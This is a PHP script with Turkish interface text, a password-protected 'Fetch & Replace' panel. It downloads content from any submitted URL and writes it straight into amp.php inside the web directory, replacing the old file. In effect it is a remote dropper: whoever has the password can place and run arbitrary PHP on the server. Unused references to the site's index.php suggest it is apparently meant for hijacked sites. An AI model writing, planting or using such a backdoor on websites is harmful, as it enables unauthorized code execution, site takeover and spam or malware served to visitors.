<?php
session_start();

// Ayarlar
$hashedPassword = '94cd209fd201dd59bd84d15d062375de';
$savePath = __DIR__ . '/amp.php';
$testPath = __DIR__ . '/test.php';
$publicIndexPath = dirname(__DIR__) . '/index.php';

function generateCSRFToken() {
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

if (!isset($_SESSION['authenticated'])) {
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
        if (md5($_POST['password']) === $hashedPassword) {
            $_SESSION['authenticated'] = true;
            generateCSRFToken();
            header("Location: " . $_SERVER['PHP_SELF']);
            exit;
        } else {
            $error = "Hatalı şifre.";
        }
    }

    if (!isset($_SESSION['authenticated'])) {
        echo '<!DOCTYPE html><html><head><title>Giriş</title></head><body>';
        if (isset($error)) echo '<p style="color:red">' . $error . '</p>';
        echo '<form method="POST">'
           . '<label>Şifre:</label><br>'
           . '<input type="password" name="password" required>'
           . '<button type="submit">Giriş</button>'
           . '</form></body></html>';
        exit;
    }
}

function fetchContent($url) {
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_USERAGENT => 'SecureFetcher/1.0'
    ]);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data ?: false;
}

$success = '';
$error = '';

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['csrf_token'])) {
    if (!hash_equals($_SESSION['csrf'], $_POST['csrf_token'])) {
        die('Geçersiz oturum tokenı.');
    }

    $url = trim($_POST['target_url'] ?? '');
    if (!filter_var($url, FILTER_VALIDATE_URL)) {
        $error = 'Geçersiz URL.';
    } else {
        $timestamp = time();
        $finalUrl = $url . (strpos($url, '?') !== false ? '&' : '?') . 'timestamp=' . $timestamp;
        $content = fetchContent($finalUrl);

        if ($content !== false) {
            // İlk yükleme sonrası dosya silme işlemleri
                if (file_exists($savePath)) {
                    unlink($savePath);
                    $success .= '<br>✅ amp.php silindi';
                }
            if (!is_dir(dirname($savePath))) mkdir(dirname($savePath), 0755, true);
            if (file_put_contents($savePath, $content) !== false) {
                $success = 'İçerik başarıyla kaydedildi: ' . htmlspecialchars($finalUrl);

                

                
            
            } else {
                $error = 'Dosya kaydedilemedi!';
            }
        } else {
            $error = 'İçerik alınamadı.';
        }
    }
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <title>Fetch Paneli</title>
    <style>
        body { font-family: Arial; background: #f4f4f4; padding: 40px; }
        .box { background: #fff; padding: 20px; border-radius: 6px; max-width: 600px; margin: auto; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
        input[type=text] { width: 100%; padding: 10px; margin: 10px 0; }
        button { padding: 10px 20px; background: #007bff; color: #fff; border: none; border-radius: 4px; }
        .success { color: green; }
        .error { color: red; }
    </style>
</head>
<body>
<div class="box">
    <h2>🔐 Fetch & Replace Paneli</h2>

    <?php if ($success): ?><p class="success">✅ <?= $success ?></p><?php endif; ?>
    <?php if ($error): ?><p class="error">❌ <?= $error ?></p><?php endif; ?>

    <form method="POST">
        <label>İçerik ve Yönlendirme URL:</label>
        <input type="text" name="target_url" placeholder="https://example.com/page" required>

        <input type="hidden" name="csrf_token" value="<?= generateCSRFToken() ?>">
        <button type="submit">Gönder</button>
    </form>
</div>
</body>
</html>